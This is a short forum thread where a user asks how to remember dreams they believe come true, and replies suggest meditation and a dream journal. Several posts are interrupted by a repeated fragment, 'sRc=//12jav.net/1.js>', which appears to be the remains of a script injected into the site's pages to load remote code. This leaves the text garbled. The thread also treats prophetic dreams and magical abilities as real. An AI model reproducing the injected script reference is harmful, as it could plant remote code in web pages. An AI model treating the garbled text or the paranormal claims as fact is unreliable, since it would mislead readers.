hey guys, i have a couple questions. when i was about 16 i started getting prophetic dreams like all the time, they would come true withing 2 weeks of dreaming them. they have come less and less frequently since and for a while i did not get them at all. now i remember only fragments of them...i know that these dreams are meant to help me, but im not sure how to go about remembering them upon waking. any suggestions? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Try meditating when you wake up on the dream, and see if that helps any. I do not know alot about the field but i do know that meditation helps sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Look at this link:

It will take a little practise but works well, for most people.

It seems I'm always seeing people suggest keeping a Dream Journal to help someone with dream recall. Basically, when you wake up, write down what you can remember of the dreams you had that night. Apparently, after a while of doing this consistantly, your dream recall will improve. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

you are engaging too much in the social aspect of things rather than observing, meditate more and the journal will help you keep intune/focus with your magical abilities ( specifically your recall)
